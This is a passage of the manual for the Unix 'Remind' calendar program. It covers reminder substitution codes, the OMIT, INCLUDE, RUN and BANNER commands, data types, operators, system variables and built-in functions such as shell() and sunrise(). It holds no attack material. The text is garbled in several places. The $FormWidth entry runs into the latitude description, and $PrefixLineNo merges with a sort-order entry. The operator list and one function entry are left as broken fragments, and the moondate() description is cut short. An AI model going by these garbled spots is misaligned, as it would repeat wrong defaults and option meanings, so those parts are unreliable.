REM 18 Oct 1990 +4 MSG Meeting with Bob %a.
On 16 October 1990, it would print "Meeting with Bob on Thursday, 18 October, 1990."
On 17 October 1990, it would print "Meeting with Bob tomorrow."
On 18 October 1990, it would print "Meeting with Bob today."
- %b
is replaced with "in diff day's time" where diff is the actual number of days between the current date and the trigger date. (OMITs have no effect.)
For example, consider:
REM 18 Oct 1990 +4 MSG Meeting with Bob %b.
On 16 October 1990, it would print "Meeting with Bob in 2 days' time."
On 17 October 1990, it would print "Meeting with Bob tomorrow."
On 18 October 1990, it would print "Meeting with Bob today."
- :
- Remind normally prints a blank line after each reminder; if the last character of the body is "%", the blank line will not be printed.
-.
- Capital letters can be used in the substitution sequence, in which case the first character of the substituted string is capitalized (if it is normally a lower-case letter.)
-
In addition to being a keyword in the REM command, OMIT is a command in its own right. Its syntax is:
OMIT day month [year]
or:
OMIT day1 month1 year1 THROUGH day2 month2 year2
The OMIT command is used to "globally" omit certain days (usually holidays). These globally-omitted days are skipped by the "-" and "+" forms of back and delta. Some examples:
OMIT 1 Jan OMIT 7 Sep 1992
The first example specifies a holiday that occurs on the same date each year - New Year's Day. The second example specifies a holiday that changes each year - Labour Day. For these types of holidays, you must create an OMIT command for each year. (Later, in the description of expressions and some of the more advanced features of Remind, you will see how to automate this for some cases.)
As with the REM command, you can use shorthand specifiers for dates; the following are equivalent: BEFORE and AFTER keywords move the trigger date of a reminder to before or after a block of omitted days, respectively. Suppose you normally run a backup on the first day of the month. However, if the first day of the month is a weekend or holiday, you run the backup on the first working day following the weekend or holiday. You could use:
REM 1 OMIT Sat Sun AFTER RUN do_backup
Let's examine how the trigger date is computed. The 1 specifies the first day of the month. The local OMIT keyword causes the AFTER keyword to move the reminder forward past weekends. Finally, the AFTER keyword will keep moving the reminder forward until it has passed any holidays specified with global OMIT commands.
The Include Command
Remind allows you to include other files in your reminder script, similar to the C preprocessor #include directive. For example, your system administrator may maintain a file of holidays or system-wide reminders. You can include these in your reminder script as follows:
INCLUDE /usr/share/remind/holidays INCLUDE /usr/share/remind/reminders
(The actual pathnames vary from system to system - ask your system administrator.)
INCLUDE files can be nested up to a depth of 8.
If you specify a filename of "-" in the INCLUDE command, Remind will begin reading from standard input.
If you specify a directory as the argument to INCLUDE, then Remind will process all files in that directory that match the shell patterm "*.rem". The files are processed in sorted order; the sort order matches that used by the shell when it expands "*.rem".
The Run Command
If you include other files in your reminder script, you may not always entirely trust the contents of the other files. For example, they may contain RUN-type reminders that could be used to access your files or perform undesired actions. The RUN command can restrict this: If you include the command RUN OFF in your top-level reminder script, any reminder or expression that would normally execute a system command is disabled. RUN ON will re-enable the execution of system commands. Note that the RUN ON command can only be used in your top-level reminder script; it will not work in any files accessed by the INCLUDE command. This is to protect you from someone placing a RUN ON command in an included file. However, the RUN OFF command can be used at top level or in an included file.
If you run Remind with the -r command-line option, RUN-type reminders and the shell() function will be disabled, regardless of any RUN commands in the reminder script. However, any command supplied with the -k option will still be executed.
One use of the RUN command is to provide a secure interface between Remind and the Elm mail system. The Elm system can automatically scan incoming mail for reminder or calendar entries, and place them in your calendar file. To use this feature, you should set the calendar filename option under Elm to be something like "~/.reminders.in", not your main reminder file! This is so that any RUN ON commands mailed to you can never be activated.
Then, you can use the Elm scan message for calendar entries command to place reminders prefaced by "->" into .reminders.in. In your main .reminders file, include the following lines:
RUN OFF # Disable RUN INCLUDE .reminders.in RUN ON # Re-enable RUN
In addition, Remind contains a few other security features. It will not read a file that is group- or world-writable. It will not run set-uid. If it reads a file you don't own, it will disable RUN and the shell() function. And if it is run as root, it will only read files owned by root.
The Banner Command
When Remind first issues a reminder, it prints a message like this:
Reminders for Friday, 30th October, 1992 (today):
(The banner is not printed if any of the calendar-producing options is used, or if the -k option is used.)
The BANNER command lets you change the format. It should appear before any REM commands. The format is:
BANNER format
The format is similar to the body of a REM command. It is passed through the substitution filter, with an implicit trigger of the current system date. Thus, the default banner is equivalent to:
BANNER Reminders for %w, %d%s %m, %y%o:
You can disable the banner completely with BANNER %. Or you can create a custom banner:
BANNER Hi - here are your reminders for %y-%t-%r:
Controlling the Omit Context
Sometimes, it is necessary to temporarily change the global OMITs that are in force for a few reminders. Three commands allow you to do this:
- PUSH-OMIT-CONTEXT
This command saves the current global OMITs on an internal stack.
- CLEAR-OMIT-CONTEXT
This command clears all of the global OMITs, starting you off with a "clean slate."
- POP-OMIT-CONTEXT
This command restores the global OMITs that were saved by the most recent PUSH-OMIT-CONTEXT.
For example, suppose you have a block of reminders that require a clear OMIT context, and that they also introduce unwanted global OMITs that could interfere with later reminders. You could use the following fragment:.
- DATETIME
The DATETIME data type consists of a date and time together. Internally, DATETIME objects are stored as the number of minutes since midnight, 1 January 1990. You can think of a DATETIME object as being the combination of DATE and TIME parts.
CONSTANTS
The following examples illustrate constants in Remind expressions:
- INT constants
12, 36, -10, 0, 1209
- STRING constants
"Hello there", "This is a test", "\n\gosd\w", ""
Note that the empty string is represented by "", and that backslashes in a string are not interpreted specially, as in they are in C.
- TIME constants
12:33, 0:01, 14:15, 16:42, 12.16, 13.00, 1.11
Note that TIME constants are written in 24-hour format. Either the period or colon can be used to separate the minutes from the hours. However, Remind will consistently output times using only one separator character. (The output separator character is chosen at compile-time.)
- DATE constants
DATE constants are expressed as 'yyyy/mm/dd' or 'yyyy-mm-dd', and the single quotes must be supplied. This distinguishes date constants from division or subtraction of integers. Examples:
´1993/02/22', '1992-12-25', '1999/01/01'
Note that DATE values are printed without the quotes. Although either '-' or '/' is accepted as a date separator on input, when dates are printed, only one will be used. The choice of whether to use '-' or '/' is made at compile-time. Note also that versions of Remind prior to 03.00.01 did not support date constants. In those versions, you must create dates using the date() function. Also, versions prior to 03.00.02 did not support the '-' date separator.
- DATETIME constants
DATETIME constants are expressed similarly to DATE constants with the addition of an "@HH:MM" part. For example:
´2008-04-05@23:11', '1999/02/03@14:06', '2001-04-07@08:30'
DATETIME values are printed without the quotes. Notes about date and time separator characters for DATE and TIME constants apply also to DATETIME constants.
OPERATORS
Remind has the following operators. Operators on the same line have equal precedence, while operators on lower lines have lower precedence than those on higher lines. The operators approximately correspond to C operators.
! - (unary logical negation and arithmetic negation) * / % + - < <= > >= == != && ||
Description OF OPERATORS
- !:
INT - INT - returns the difference of two INTs.
DATE - DATE - returns (as an INT) the difference in days between two DATEs.
TIME - TIME - returns (as an INT) the difference in minutes between two TIMEs.
DATETIME - DATETIME - returns (as an INT) the difference in minutes between two DATETIMEs.
DATE - INT - returns a DATE that is INT days earlier than the original DATE.
TIME - INT - returns a TIME that is INT minutes earlier than the original TIME.
DATETIME - INT - returns a DATETIME that is INT minutes earlier than the original DATETIME.
- <, <=, >, and >=
These are the comparison operators. They can take operands of any type, but both operands must be of the same type. The comparison operators return 1 if the comparison is true, or 0 if it is false. Note that string comparison is done following the lexical ordering of characters on your system, and that upper and lower case are distinct for these operators.
- ==, !=
==)
will cause an error if f is zero.
VARIABLES
Remind allows you to assign values to variables. The SET command is used as follows:
SET var expr
Var is the name of a variable. It must start with a letter or underscore, and consist only of letters, digits and underscores. Only the first 12 characters of a variable name are significant. Variable names are not case sensitive; thus, "Afoo" and "afOo" are the same variable. Examples:
SYSTEM VARIABLES
In addition to the regular user variables, Remind has several "system variables" that are used to query or control the operating state of Remind. System variables are available starting from version 03.00.07 of Remind.
All system variables begin with a dollar sign '$'. They can be used in SET commands and expressions just as regular variables can. All system variables always hold values of a specified type. In addition, some system variables cannot be modified, and you cannot create new system variables. System variables can be initialized on the command line with the -i option, but you may need to quote them to avoid having the shell interpret the dollar sign. System variable names are not case-sensitive.
The following system variables are defined. Those marked "read-only" cannot be changed with the SET command. All system variables hold values of type INT, unless otherwise specified.
- $CalcUTC
If 1 (the default), then Remind uses C library functions to calculate the number of minutes between local and Universal Time Coordinated. This affects astronomical calculations (sunrise() for example.) If 0, then you must supply the number of minutes between local and Universal Time Coordinated in the $MinsFromUTC system variable.
- $CalMode (read-only)
If non-zero, then the -c option was supplied on the command line.
- $Daemon (read-only)
If the daemon mode -z was invoked, contains the number of minutes between wakeups. If not running in daemon mode, contains 0.
- $DateSep
This variable can be set only to "/" or "-". It holds the character used to separate portions of a date when Remind prints a DATE or DATETIME value.
- $DefaultPrio
The default priority assigned to reminders without a PRIORITY clause. You can set this as required to adjust the priorities of blocks of reminders without having to type priorities for individual reminders. At startup, $DefaultPrio is set to 5000; it can range from 0 to 9999.
- $DontFork (read-only)
If non-zero, then the -c option was supplied on the command line.
- $DontTrigAts (read-only)
The number of times that the -a option was supplied on the command line.
- $DontQueue (read-only)
If non-zero, then the -q option was supplied on the command line.
- $EndSent (STRING type)
Contains a list of characters that end a sentence. The MSF keyword inserts two spaces after these characters. Initially, $EndSent is set to ".!?" (period, exclamation mark, and question mark.)
- $EndSentIg (STRING type)
Contains a list of characters that should be ignored when MSF decides whether or not to place two spaces after a sentence. Initially, is set to "'>)]}"+CHAR(34) (single-quote, greater-than, right parenthesis, right bracket, right brace, and double-quote.)
For example, the default values work as follows:
MSF He said, "Huh! (Two spaces will follow this.)" Yup.
because the final parenthesis and quote are ignored (for the purposes of spacing) when they follow a period.
- $FirstIndent
The number of spaces by which to indent the first line of a MSF-type reminder. The default is 0.
- $FoldYear
The standard Unix library functions may have difficulty dealing with dates later than 2037. If this variable is set to 1, then the UTC calculations "fold back" years later than 2037 before using the Unix library functions. For example, to find out whether or not daylight saving time is in effect in June, 2077, the year is "folded back" to 2010, because both years begin on a Monday, and both are non-leapyears. The rules for daylight saving time are thus presumed to be identical for both years, and the Unix library functions can handle 2010. By default, this variable is 0. Set it to 1 if the sun or UTC functions misbehave for years greater than 2037.
- $FormWidth
The maximum width of each line of text for formatting MSF-type reminders. The default is to 59. Northern latitudes are positive; southern ones are negative. For southern latitudes, all three components should be negative.
- $Location (STRING type)
This is a string specifying the name of your location. It is usually the name of your town or city. It can be set to whatever you like, but good style indicates that it should be kept consistent with the latitude and longitude system variables.
- $LongDeg, $LongMin, $LongSec
These specify the longitude of your location. $LongDeg can range from -180 to 180. Western longitudes are positive; eastern ones are negative. Note that all three components should have the same sign: All positive for Western longitudes and all negative for Eastern longitudes.
The latitude and longitude information is required for the functions sunrise() and sunset(). Default values can be compiled into Remind, or you can SET the correct values at the start of your reminder scripts.
- $MaxSatIter
The maximum number of iterations for the SATISFY clause (described later.) Must be at least 10.
- $MinsFromUTC
The number of minutes between Universal Time Coordinated and local time. If $CalcUTC is non-zero, this is calculated upon startup of Remind. Otherwise, you must set it explicitly. If $CalcUTC is zero, then $MinsFromUTC is used in the astronomical calculations. You must adjust it for daylight saving.
- $NumTrig (read-only)
Contains the number of reminders triggered for the current date. One use for this variable is as follows: Suppose you wish to shade in the box of a PostScript calendar whenever a holiday is triggered. You could save the value of $NumTrig in a regular variable prior to executing a block of holiday reminders. If the value of $NumTrig after the holiday block is greater than the saved value, then at least one holiday was triggered, and you can execute the command to shade in the calendar box. (See the section "Calendar Mode".)
Note that $NumTrig is affected only by REM commands; triggers in IFTRIG commands do not affect it.
- $PrefixLineNo (read-only)
If non-zero, then the option is used, 1 if sorting by time in ascending order, or 2 if sorting by time in descending order.
- $SubsIndent
The number of spaces by which all lines (except the first) of an MSF-type reminder should be indented. The default is 0.
- $T (read-only, DATE type)
Exactly equivalent to trigdate(). (See BUILT-IN FUNCTIONS.)
- $Td (read-only)
Equivalent to day(trigdate()).
- $Tm (read-only)
Equivalent to monnum(trigdate()).
- $Tw (read-only)
Equivalent to wkdaynum(trigdate()).
- $Ty (read-only)
Equivalent to year(trigdate()).
- $TimeSep
This variable can be set only to ":" or ".". It holds the character used to separate portions of a time when Remind prints a TIME or DATETIME value.
- $UntimedFirst (read-only)
Set to 1 if the -g option is used with a fourth sort character of "d"; set to 0 otherwise.
- $U (read-only, DATE type)
Exactly equivalent to today(). (See BUILT-IN FUNCTIONS.)
- $Ud (read-only)
Equivalent to day(today()).
- $Um (read-only)
Equivalent to monnum(today()).
- $Uw (read-only)
Equivalent to wkdaynum(today()).
- $Uy (read-only)
Equivalent to year(today()).
Note: If any of the calendar modes are in effect, then the values of $Daemon, $DontFork, $DontTrigAts, $DontQueue, $HushMode, $IgnoreOnce, $InfDelta, and $NextMode are not meaningful.
BUILT-IN FUNCTIONS
Remind has a plethora of built-in functions. The syntax for a function call is the same as in C - the function name, followed a comma-separated list of arguments in parentheses. Function names are not case-sensitive. If a function takes no arguments, it must be followed by "()" in the function call. Otherwise, Remind will interpret it as a variable name, and probably not work correctly.
In the descriptions below, short forms are used to denote acceptable types for the arguments. The characters "i", "s", "d", "t" and "q" denote INT, STRING, DATE, TIME and DATETIME arguments, respectively. If an argument can be one of several types, the characters are concatenated. For example, "di_arg" denotes an argument that can be a DATE or an INT. "x_arg" denotes an argument that can be of any type. The type of the argument is followed by an underscore and an identifier naming the argument.
The built-in functions are:
- abs(i_num)
Returns the absolute value of num.
- access(s_file, si_mode)
Tests the access permissions for the file file. Mode can be a string, containing a mix of the characters "rwx" for read, write and execute permission testing. Alternatively, mode can be a number as described in the UNIX access(2) system call. The function returns 0 if the file can be accessed with the specified mode, and -1 otherwise.
- args(s_fname)
Returns the number of arguments expected by the user-defined function fname, or -1 if no such user-defined function exists. Note that this function examines only user-defined functions, not built-in functions. Its main use is to determine whether or not a particular user-defined function has been defined previously. The args() function is available only in versions of Remind from 03.00.04 and up.
- asc(s_string)
Returns an INT that is the ASCII code of the first character in string. As a special case, asc("") returns 0.
- baseyr()
Returns the "base year" that was compiled into Remind (normally 1990.) All dates are stored internally as the number of days since 1 January of baseyr().
- char(i_i1 [,i_i2...])
This function can take any number of INT arguments. It returns a STRING consisting of the characters specified by the arguments. Note that none of the arguments can be 0, unless there is only one argument. As a special case, char(0) returns "".
Note that because Remind does not support escaping of characters in strings, the only way to get a double-quote in a string is to use char(34).
- choose(i_index, x_arg1 [,x_arg2...])
Choose must take at least two arguments, the first of which is an INT. If index is n, then the nth subsequent argument is returned. If index is less than 1, then arg1 is returned. If index is greater than the number of subsequent arguments, then the last argument is returned. Examples:
choose(0, "foo", 1:13, 1000) returns "foo" choose(1, "foo", 1:13, 1000) returns "foo" choose(2, "foo", 1:13, 1000) returns 1:13 choose(3, "foo", 1:13, 1000) returns 1000 choose(4, "foo", 1:13, 1000) returns 1000
Note that all arguments to choose() are always evaluated.
- coerce(s_type, x_arg)
This function converts arg to the specified type, if such conversion is possible. Type must be one of "INT", "STRING", "DATE", "TIME" or "DATETIME" (case-insensitive). The conversion rules are as follows:
If arg is already of the type specified, it is returned unchanged.
If type is "STRING", then arg is converted to a string consisting of its printed representation.
If type is "DATE", then an INT arg is converted by interpreting it as the number of days since 1 January baseyr(). A STRING arg is converted by attempting to read it as if it were a printed date. A DATETIME is converted to a date by dropping the time component. A TIME arg cannot be converted to a date.
If type is "TIME", then an INT arg is converted by interpreting it as the number of minutes since midnight. A STRING arg is converted by attempting to read it as if it were a printed time. A DATETIME is converted to a time by dropping the date component. A DATE arg cannot be converted to a time.
If type is "DATETIME", then an INT arg is converted by interpreting it as the number of minutes since midnight, 1 January baseyr(). A STRING is converted by attempting to read it as if it were a printed datetime. Other types cannot be converted to a datetime.
If type is "INT", then DATE, TIME and DATETIME arguments are converted using the reverse of procedures described above. A STRING arg is converted by parsing it as an integer.
- current()
Returns the current date and time as a DATETIME object. This may be the actual date and time, or may be the date and time supplied on the command line.
- date(i_y, i_m, i_d)
The date() function returns a DATE object with the year, month and day components specified by y, m and d.
- datepart(dq_datetime)
Returns a DATE object representing the date portion of datetime.
- datetime(args)
The datetime() function can take anywhere from two to five arguments. It always returns a DATETIME generated from its arguments.
If you supply two arguments, the first must be a DATE and the second a TIME.
If you supply three arguments, the first must be a DATE and the second and third must be INTs. The second and third arguments are interpreted as hours and minutes and converted to a TIME.
If you supply four arguments, the first three must be INTs, interpreted as the year, month and day. The fourth argument must be a TIME.
Finally, if you supply five arguments, they must all be INTs and are interpreted as year, month, day, hour and minute.
- dawn([dq_date])
Returns the time of "civil dawn" on the specified date. If date is omitted, defaults to today(). If a datetime object is supplied, only the date component is used.
- day(dq_date)
This function takes a DATE or DATETIME as an argument, and returns an INT that is the day-of-month component of date.
- daysinmon(i_m, i_y)
Returns the number of days in month m (1-12) of the year y.
- defined(s_var)
Returns 1 if the variable named by var is defined, or 0 if it is not.
Note that defined() takes a STRING argument; thus, to check if variable X is defined, use:
defined("X")
and not:
defined(X)
The second example will attempt to evaluate X, and will return an error if it is undefined or not of type STRING.
- dosubst(s_str [,d_date [,t_time]]) or dosubst(s_str [,q_datetime])
Returns a STRING that is the result of passing str through the substitution filter described earlier. The parameters date and time (or datetime) establish the effective trigger date and time used by the substitution filter. If date and time are omitted, they default to today() and now().
Note that if str does not end with "%", a newline character will be added to the end of the result. Also, calling dosubst() with a date that is in the past (i.e., if date < today()) will produce undefined results.
Dosubst() is only available starting from version 03.00.04 of Remind.
- dusk([dq_date])
Returns the time of "civil twilight" on the specified date. If date is omitted, defaults to today().
- easterdate(dqi_arg)
If arg is an INT, then returns the date of Easter Sunday for the specified year. If arg is a DATE or DATETIME, then returns the date of the next Easter Sunday on or after arg. (The time component of a datetime is ignored.)
- evaltrig(s_trigger [,dq_start])
Evaluates trigger as if it were a REM or IFTRIG trigger specification and returns the trigger date as a DATE (or as a DATETIME if there is an AT clause.) Returns a negative INT if no trigger could be computed.
Normally, evaltrig finds a trigger date on or after today. If you supply the start argument, then it scans starting from there.
For example, the expression:
evaltrig("Mon 1", '2008-10-07')
returns '2008-11-03', since that is the first date on or after 7 October 2008 that satisfies "Mon 1".
If you want to see how many days it is from the first Monday in October, 2008 to the first Monday in November, 2008, use:
evaltrig("Mon 1", '2008-11-01') - evaltrig("Mon 1", '2008-10-01')
and the answer is 28. The trigger argument to evaltrig can have all the usual trigger clauses (OMIT, AT, SKIP, etc.) but cannot have a SATISFY, MSG, etc. reminder-type clause.
- filedate(s_filename)
Returns the modification date of filename. If filename does not exist, or its modification date is before the year baseyr(), then 1 January of baseyr() is returned.
- filedatetime(s_filename)
Returns the modification date and time of filename. If filename does not exist, or its modification date is before the year baseyr(), then midnight, 1 January of baseyr() is returned.
- filedir()
Returns the directory that contains the current file being processed. It may be a relative or absolute pathname, but is guaranteed to be correct for use in an INCLUDE command as follows:
INCLUDE [filedir()]/stuff
This includes the file "stuff" in the same directory as the current file being processed.
- filename()
Returns (as a STRING) the name of the current file being processed by Remind. Inside included files, returns the name of the included file.
- getenv(s_envvar)
Similar to the getenv(2) system call. Returns a string representing the value of the specified environment variable. Returns "" if the environment variable is not defined. Note that the names of environment variables are generally case-sensitive; thus, getenv("HOME") is not the same as getenv("home").
- hebdate(i_day, s_hebmon [,idq_yrstart [,i_jahr [,i_aflag]]])
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebday(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebmon(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebyear(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hour(tq_time)
Returns the hour component of time.
- iif(si_test1, x_arg1, [si_test2, x_arg2,...], x_default)
If test1 is not zero or the null string, returns arg1. Otherwise, if test2 is not zero or the null string, returns arg2, and so on. If all of the test arguments are false, returns default. Note that all arguments are always evaluated. This function accepts an odd number of arguments - note that prior to version 03.00.05 of Remind, it accepted 3 arguments only. The 3-argument version of iif() is compatible with previous versions of Remind.
- index(s_search, s_target [,i_start)
Returns an INT that is the location of target in the string search. The first character of a string is numbered 1. If target does not exist in search, then 0 is returned.
The optional parameter start specifies the position in search at which to start looking for target.
- isdst([d_date [,t_time]]) or isdst(q_datetime)
Returns a positive number if daylight saving time is in effect on the specified date and time. Date defaults to today() and time defaults to midnight.
Note that this function is only as reliable as the C run-time library functions. It is available starting with version 03.00.07 of Remind.
- isleap(idq_arg)
Returns 1 if arg is a leap year, and 0 otherwise. Arg can be an INT, DATE or DATETIME object. If a DATE or DATETIME is supplied, then the year component is used in the test.
- isomitted(dq_date)
Returns 1 if date is omitted, given the current global OMIT context. Returns 0 otherwise. (If a datetime is supplied, only the date part is used.) Note that any local OMIT or OMITFUNC clauses are not taken into account by this function.
- language()
Returns a STRING naming the language supported by Remind. (See "Foreign Language Support.") By default, Remind is compiled to support English messages, so this function returns "English". For other languages, this function will return the English name of the language (e.g. "German") Note that language() is not available in versions of Remind prior to 03.00.02.
- lower(s_string)
Returns a STRING with all upper-case characters in string converted to lower-case.
- max(x_arg1 [,x_arg2...)
Can take any number of arguments, and returns the maximum. The arguments can be of any type, but must all be of the same type. They are compared as with the > operator.
- min(x_arg1 [,x_arg2...)
Can take any number of arguments, and returns the minimum. The arguments can be of any type, but must all be of the same type. They are compared as with the < operator.
- minsfromutc([d_date [,t_time]]) or minsfromutc(q_datetime)
Returns the number of minutes from Universal Time Coordinated (formerly GMT) to local time on the specified date and time. Date defaults to today() and time defaults to midnight. If local time is before UTC, the result is negative. Otherwise, the result is positive.
Note that this function is only as reliable as the C run-time library functions. It is available starting with version 03.00.07 of Remind.
- minute(tq_time)
Returns the minute component of time.
- mon(dqi_arg)
If arg is of DATE or DATETIME type, returns a string that names the month component of the date. If arg is an INT from 1 to 12, returns a string that names the month.
- monnum(dq_date)
Returns an INT from 1 to 12, representing the month component of date.
- moondate(i_phase [,d_date [,t_time]]) or moondate(i_phase, q_datetime)
This function returns the date.
For example, the following returns the date of the next full moon:
SET fullmoon moondate(2)
- moontime(i_phase [,d_date [,t_time]]) or moontime(i_phase, q_datetime)
This function returns the time. Moontime() is intended to be used in conjunction with moondate(). The moondate() and moontime() functions are accurate to within a couple of minutes of the times in "Old Farmer's Almanac" for Ottawa, Ontario.
For example, the following returns the date and time of the next full moon:
MSG Next full moon at [moontime(2)] on [moondate(2)]
- moondatetime(i_phase [,d_date [,t_time]]) or moondatetime(i_phase, q_datetime)
This function is similar to moondate and moontime, but returns a DATETIME result.
- moonphase([d_date [,t_time]]) or moonphase(q_datetime)
This function returns the phase of the moon on date and time, which default to today() and midnight, respectively. The returned value is an integer from 0 to 359, representing the phase of the moon in degrees. 0 is a new moon, 180 is a full moon, 90 is first-quarter, etc.
- nonomitted(dq_start, dq_end [,s_wkday...])
This function returns the number of non-omitted days between start and end. If start is non-omitted, then it is counted. end is never counted.
Note that end must be greater than or equal to start or an error is reported. In addition to using the global OMIT context, you can supply additional arguments that are names of weekdays to be omitted. However, in a REM command, any local OMITFUNC clause is not taken into account by this function.
For example, the following line sets a to 11 (assuming no global OMITs):
set a nonomitted('2007-08-01', '2007-08-16', "Sat", "Sun")
because Thursday, 16 August 2007 is the 11th working day (not counting Saturday and Sunday) after Wednesday, 1 August 2007.
nonomitted has various uses. For example, many schools run on a six-day cycle and the day number is not incremented on holidays. Suppose the school year starts with Day 1 on 4 September 2007. The following reminder will label day numbers in a calendar:
IF today() >= '2007-09-04' set daynum nonomitted('2007-09-04', today(), "Sat", "Sun") REM OMIT SAT SUN SKIP CAL Day [(daynum % 6) + 1] ENDIF
Obviously, the answer you get from nonomitted depends on the global OMIT context. If you use moveable OMITs, you may get inconsistent results.
Here is a more complex use for nonomitted. My garbage collection follows two interleaved 14-day cycles: One Friday, garbage and paper recycling ("Black Box") are collected. The next Friday, garbage and plastic recycling ("Blue Box") are collected. If any of Monday-Friday is a holiday, collection is delayed until the Saturday. Here's a way to encode these rules:
fset _garbhol(x) wkdaynum(x) == 5 && nonomitted(x-4, x+1) < 5 REM 12 November 1999 *14 AFTER OMITFUNC _garbhol MSG Black Box REM 19 November 1999 *14 AFTER OMITFUNC _garbhol MSG Blue Box
Here's how it works: The _garbhol(x) user-defined function returns 1 if and only if (1) x is a Friday and (2) there is at least one OMITted day from the previous Monday up to and including the Friday.
The first REM statement sets up the 14-day black-box cycle. The AFTER keyword makes it move collection to the Saturday if _garbhol returns 1. The second REM statement sets up the 14-day blue-box cycle with a similar adjustment made by AFTER in conjunction with _garbhol.
- now()
Returns the current system time, as a TIME type. This may be the actual time, or a time supplied on the command line.
- ord(i_num)
Returns a string that is the ordinal number num. For example, ord(2) returns "2nd", and ord(213) returns "213th".
- ostype()
Returns "UNIX". Remind used to run on OS/2 and MS-DOS, but does not any longer.
- plural(i_num [,s_str1 [,s_str2]])
Can take from one to three arguments. If one argument is supplied, returns "s" if num is not 1, and "" if num is 1.
If two arguments are supplied, returns str1 + "s" if num is not 1. Otherwise, returns str1.
If three arguments are supplied, returns str1 if num is 1, and str2 otherwise.
- psmoon(i_phase [,i_size [,s_note [,i_notesize]]])
[DEPRECATED] Returns a STRING consisting of PostScript code to draw a moon in the upper-left hand corner of the calendar box. Phase specifies the phase of the moon, and is 0 (new moon), 1 (first quarter), 2 (full moon) or 3 (third quarter). If size is specified, it controls the radius of the moon in PostScript units (1/72 inch.) If it is not specified or is negative, the size of the day-number font is used.
For example, the following four lines place moon symbols on the PostScript calendar:
REM [moondate(0)] PS [psmoon(0)] REM [moondate(1)] PS [psmoon(1)] REM [moondate(2)] PS [psmoon(2)] REM [moondate(3)] PS [psmoon(3)]
If note is specified, the text is used to annotate the moon display. The font is the same font used for calendar entries. If notesize is given, it specifies the font size to use for the annotation, in PostScript units (1/72 inch.) If notesize is not given, it defaults to the size used for calendar entries. (If you annotate the display, be careful not to overwrite the day number -- Remind does not check for this.) For example, if you want the time of each new moon displayed, you could use this in your reminder script:
REM [moondate(0)] PS [psmoon(0, -1, moontime(0)+"")]
Note how the time is coerced to a string by concatenating the null string.
- psshade(i_gray) or psshade(i_red, i_green, i_blue)
[DEPRECATED] Returns a STRING that consists of PostScript commands to shade a calendar box. Num can range from 0 (completely black) to 100 (completely white.) If three arguments are given, they specify red, green and blue intensity from 0 to 100. Here's an example of how to use this:
REM Sat Sun PS [psshade(95)]
The above command emits PostScript code to lightly shade the boxes for Saturday and Sunday in a PostScript calendar.
Note that psmoon and psshade are deprecated; instead you should use the SPECIAL SHADE and SPECIAL MOON reminders as described in "Out-of-Band Reminders."
- realcurrent()
Returns (as a DATETIME) the true date and time of day as provided by the operating system. This is in contrast to current(), which may return a time supplied on the command line.
- realnow()
Returns the true time of day as provided by the operating system. This is in contrast to now(), which may return a time supplied on the command line.
- realtoday()
Returns the date as provided by the operating system. This is in contrast to Remind's concept of "today", which may be changed if it is running in calendar mode, or if a date has been supplied on the command line.
- sgn(i_num)
Returns -1 if num is negative, 1 if num is positive, and 0 if num is zero.
- shell(s_cmd [,i_maxlen])
Executes cmd as a system command, and returns the first 511 characters of output resulting from cmd. Any whitespace character in the output is converted to a space. Note that if RUN OFF has been executed, or the -r command-line option has been used, shell() will result in an error, and cmd will not be executed.
If maxlen is specified, then shell() returns the first maxlen characters of output (rather than the first 511). If maxlen is specified as a negative number, then all the output from cmd is returned.
-")
takes a back to 2009-05-13.
- strlen(s_str)
Returns the length of str.
- substr(s_str, i_start [,i_end])
Returns a STRING consisting of all characters in str from start up to and including end. Characters are numbered from 1. If end is not supplied, then it defaults to the length of str.
- sunrise([dq_date])
Returns a TIME indicating the time of sunrise on the specified date (default today().) In high latitudes, there may be no sunrise on a particular day, in which case sunrise() returns the INT 0 if the sun never sets, or 1440 if it never rises.
- sunset([dq_date])
Returns a TIME indicating the time of sunset on the specified date (default today().) In high latitudes, there may be no sunset on a particular day, in which case sunset() returns the INT 0 if the sun never rises, or 1440 if it never sets.
The functions sunrise() and sunset() are based on an algorithm in "Almanac for Computers for the year 1978" by L. E. Doggett, Nautical Almanac Office, USNO. They require the latitude and longitude to be specified by setting the appropriate system variables. (See "System Variables".) The sun functions should be accurate to within about 4 minutes for latitudes lower than 60 degrees. The functions are available starting from version 03.00.07 of Remind.
- time(i_hr, i_min)
Creates a TIME with the hour and minute components specified by hr and min.
- timepart(tq_datetime)
Returns a TIME object representing the time portion of datetime.
- today()
Returns Remind's notion of "today." This may be the actual system date, or a date supplied on the command line, or the date of the calendar entry currently being computed.
- trigdate()
Returns the calculated trigger date of the last REM or IFTRIG command. If used in the body of a REM command, returns that command's trigger date. If the most recent REM command did not yield a computable trigger date, returns the integer 0.
- trigdatetime()
Similar to trigdate(), but returns a DATETIME if the most recent triggerable REM command had an AT clause. If there was no AT clause, returns a DATE. If no trigger could be computed, returns the integer 0.
- trigger(d_date [,t_time [,i_utcflag]]) or trigger(q_datetime [,i_utcflag])
Returns a string suitable for use in a REM command or a SCANFROM or UNTIL clause, allowing you to calculate trigger dates in advance. Note that in earlier versions of Remind, trigger was required to convert a date into something the REM command could consume. However, in this version of Remind, you can omit it. Note that trigger() always returns its result in English, even for foreign-language versions of Remind. This is to avoid problems with certain C libraries that do not handle accented characters properly. Normally, the date and time are the local date and time; however, if utcflag is non-zero, the date and time are interpreted as UTC times, and are converted to local time. Examples:
trigger('1993/04/01')
returns "1 April 1993",
trigger('1994/08/09', 12:33)
returns "9 August 1994 AT 12:33", as does:
trigger('1994/08/09@12:33').
Finally:
trigger('1994/12/01', 03:00, 1)
returns "30 November 1994 AT 22:00" for EST, which is 5 hours behind UTC. The value for your time zone may differ.
- trigtime()
Returns the time of the last REM command with an AT clause. If the last REM did not have an AT clause, returns the integer 0.
- trigvalid()
Returns 1 if the value returned by trigdate() is valid for the most recent REM command, or 0 otherwise. Sometimes REM commands cannot calculate a trigger date. For example, the following REM command can never be triggered:
REM Mon OMIT Mon SKIP MSG Impossible!
- typeof(x_arg)
Returns "STRING", "INT", "DATE", "TIME" or "DATETIME", depending on the type of arg.
- tzconvert(q_datetime, s_srczone [,s_dstzone])
Converts datetime from the time zone named by srczone to the time zone named by dstzone. If dstzone is omitted, the default system time zone is used. The return value is a DATETIME. Time zone names are system-dependent; consult your operating system for legal values. Here is an example:
tzconvert('2007-07-08@01:14', "Canada/Eastern", "Canada/Pacific") returns 2007-07-07@22:14
- upper(s_string)
